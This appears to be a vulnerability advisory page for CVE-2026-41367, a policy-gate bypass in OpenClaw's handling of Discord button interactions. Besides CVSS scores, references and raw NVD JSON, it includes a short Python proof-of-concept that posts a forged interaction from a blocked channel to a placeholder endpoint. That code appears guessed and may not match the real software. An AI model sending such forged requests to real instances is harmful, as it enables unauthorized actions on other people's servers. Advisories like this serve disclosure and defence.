CVE-2026-41367

Description

OpenClaw versions 2026.2.14 through 2026.3.24 fail to consistently apply guild and channel policy gates to Discord button and component interactions. Attackers can trigger privileged component actions from blocked contexts by bypassing channel policy enforcement.

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw 2026.2.14

OpenClaw 2026.3.24

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target API endpoint for OpenClaw interaction handling
target_url = "https://target-openclaw-instance.com/api/interaction"

# Malicious payload simulating a button click from a blocked channel
# The vulnerability implies that the check on 'channel_id' policy is missing or bypassed
payload = {
    "id": "interaction_id_123",
    "token": "interaction_token_xyz",
    "type": 3, # Message Component (Button)
    "data": {
        "component_type": 2,
        "custom_id": "privileged_action_button"
    },
    "guild_id": "target_guild_id",
    "channel_id": "blocked_channel_id", # This channel should trigger a policy deny
    "user": {
        "id": "attacker_user_id",
        "username": "attacker"
    }
}

# Sending the request
response = requests.post(target_url, json=payload)

# Check if the privileged action was executed despite the channel restriction
if response.status_code == 200 and "success" in response.text:
    print("PoC successful: Policy bypassed.")
else:
    print("PoC failed: Policy enforced.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41367
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41367
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41367/
[4] VulDB https://vuldb.com/cve/CVE-2026-41367
[5] https://github.com/openclaw/openclaw/security/advisories/GHSA-jp4j-q5fc-58gv
[6] https://www.vulncheck.com/advisories/openclaw-policy-enforcement-bypass-in-discord-component-interactions

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41367", "sourceIdentifier": "[email protected]", "published": "2026-04-28T00:16:25.887", "lastModified": "2026-04-28T18:45:10.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions 2026.2.14 through 2026.3.24 fail to consistently apply guild and channel policy gates to Discord button and component interactions. Attackers can trigger privileged component actions from blocked contexts by bypassing channel policy enforcement."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "2026.2.14", "versionEndExcluding": "2026.3.28", "matchCriteriaId": "FDF2145B-4331-4485-878C-6404D160FA96"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jp4j-q5fc-58gv", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-policy-enforcement-bypass-in-discord-component-interactions", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}